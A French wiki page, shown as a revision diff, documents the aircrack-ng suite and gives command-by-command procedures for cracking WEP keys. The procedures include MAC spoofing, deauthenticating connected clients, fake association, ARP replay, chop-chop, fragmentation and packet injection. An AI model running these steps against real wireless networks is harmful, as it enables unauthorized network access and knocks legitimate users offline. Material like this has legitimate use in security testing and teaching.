Aircrack-ng
De Hack-it.org.
(Aircrack-ng, outils et utilisation) |
Yop (discuter | contributions) (→buddy-ng) |
||
Ligne 2 : | Ligne 2 : | ||
=== aircrack-ng === | === aircrack-ng === | ||
- | Sert à casser | + | Sert à casser une clé WEP ou WPA, depuis la derniere version, il utilise l'algorythme PTW par défaut pour le cassage du WEP. |
=== airbase-ng === | === airbase-ng === | ||
- | Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap". | + | Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap". Peut aussi être utilisé en mode ad hoc, simule un poste client ad hoc. |
=== airdecap-ng === | === airdecap-ng === | ||
Ligne 33 : | Ligne 33 : | ||
=== airtun-ng === | === airtun-ng === | ||
+ | |||
+ | Permet de dé/chiffrer en WEP des donnés, il peut servir à se connecter en mode monitor, faire une capture en live qui ne prend pas les beacon frame (utile pour une analyse wireshark / tcpdump) | ||
=== buddy-ng === | === buddy-ng === | ||
- | A utiliser avec easside-ng | + | A utiliser avec easside-ng, c'est le serveur auquel se connecte easside-ng |
=== easside-ng === | === easside-ng === | ||
Ligne 55 : | Ligne 57 : | ||
=== wesside-ng === | === wesside-ng === | ||
Outil permettant l'automatisation du crack de clé WEP. | Outil permettant l'automatisation du crack de clé WEP. | ||
+ | |||
+ | |||
+ | <center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center> | ||
+ | |||
+ | == Les drivers WiFi == | ||
+ | Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng. | ||
+ | * Pour connaitre les drivers supportés: | ||
+ | >>> airdriver-ng supported | ||
+ | |||
+ | * Pour connaitre les drivers déjà installés: | ||
+ | >>> aidriver-ng installed | ||
+ | |||
+ | * Pour connaitre les drivers WiFi chargés dans le kernel: | ||
+ | >>> airdriver-ng loaded | ||
+ | |||
+ | * Pour détecter les cartes WiFi: | ||
+ | >>> airdriver-ng detect | ||
+ | |||
+ | * Pour décharger un driver inutile: | ||
+ | >>> airdriver-ng unload $num_driver | ||
+ | |||
+ | * Pour compiler un driver: | ||
+ | Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper: | ||
+ | <br />>>> airdriver-ng compile $num_driver | ||
+ | |||
+ | * Pour installer un driver fraichement compilé: | ||
+ | >>> airdriver-ng install $num_driver | ||
+ | |||
+ | * Pour charger un driver dans le kernel: | ||
+ | >>> airdriver-ng load $num_driver | ||
+ | |||
+ | * Pour avoir des détails sur un driver: | ||
+ | >>> airdriver-ng details $num_driver | ||
== Les différents types d'attaques == | == Les différents types d'attaques == | ||
- | + | Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte. | |
- | + | ||
=== Légende === | === Légende === | ||
Ligne 70 : | Ligne 104 : | ||
=== Mac spoofing === | === Mac spoofing === | ||
- | Pour les procédures ci-dessous, dans les cas | + | Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte: |
- | <br />>>> | + | <br />>>> ifconfig $iface down |
- | <br /> | + | <br />>>>macchanger --mac $mac_client $iface |
=== Méthode "ARP replay" === | === Méthode "ARP replay" === | ||
- | '''Méthode avec client | + | '''Méthode avec client et sans filtrage MAC''' |
* Mettre carte en monitor: | * Mettre carte en monitor: | ||
>>> ifconfig $iface down | >>> ifconfig $iface down | ||
Ligne 102 : | Ligne 136 : | ||
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
>>> aircrack-ng $fichier_capture | >>> aircrack-ng $fichier_capture | ||
+ | <br />''CRACKED !!!'' | ||
- | === Methode "chop-chop" et par fragmentation === | + | === Methode "chop-chop" et "par fragmentation" === |
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)''' | '''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)''' | ||
* Mettre la carte en monitor: | * Mettre la carte en monitor: | ||
- | >>> ifconfig $iface | + | >>> ifconfig $iface |
<br />>>> airmon-ng start $iface | <br />>>> airmon-ng start $iface | ||
Ligne 114 : | Ligne 149 : | ||
* Lancer la capture d'IVs: | * Lancer la capture d'IVs: | ||
- | >>> | + | >>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface |
<br />-w = préfice à utiliser pour le nom du fichier de capture | <br />-w = préfice à utiliser pour le nom du fichier de capture | ||
<br />''Laisser tourner...'' | <br />''Laisser tourner...'' | ||
Ligne 128 : | Ligne 163 : | ||
<br />-o = nombre de jeux de paquets à envoyer à la fois | <br />-o = nombre de jeux de paquets à envoyer à la fois | ||
<br />-q = intervale entre 2 paquets "keep-alive" | <br />-q = intervale entre 2 paquets "keep-alive" | ||
+ | ** En cas de filtrage MAC: | ||
+ | >>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface | ||
+ | <br />-0 = déauthentification | ||
+ | <br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment) | ||
+ | <br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP | ||
+ | <br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin'' | ||
* Attaque: | * Attaque: | ||
Ligne 153 : | Ligne 194 : | ||
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
>>> aircrack-ng $fichier_capture | >>> aircrack-ng $fichier_capture | ||
+ | <br />''CRACKED'' | ||
=== Méthode "-p 0841" === | === Méthode "-p 0841" === | ||
Ligne 170 : | Ligne 212 : | ||
* Associer la carte à la station: | * Associer la carte à la station: | ||
- | >>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface | + | >>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface |
<br />-1 = fake association | <br />-1 = fake association | ||
<br />0 = temps d'attente (en ms) entre 2 tentatives | <br />0 = temps d'attente (en ms) entre 2 tentatives | ||
Ligne 179 : | Ligne 221 : | ||
<br />-o = nombre de jeux de paquets à envoyer à la fois | <br />-o = nombre de jeux de paquets à envoyer à la fois | ||
<br />-q = intervale entre 2 paquets "keep-alive" | <br />-q = intervale entre 2 paquets "keep-alive" | ||
+ | ** En cas de filtrage MAC: | ||
+ | >>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface | ||
+ | <br />-0 = déauthentification | ||
+ | <br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment) | ||
+ | <br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP | ||
+ | <br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin'' | ||
* Lancer l'injection: | * Lancer l'injection: | ||
Ligne 188 : | Ligne 236 : | ||
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
>>> aircrack-ng $fichier_capture | >>> aircrack-ng $fichier_capture | ||
+ | <br />''CRACKED'' |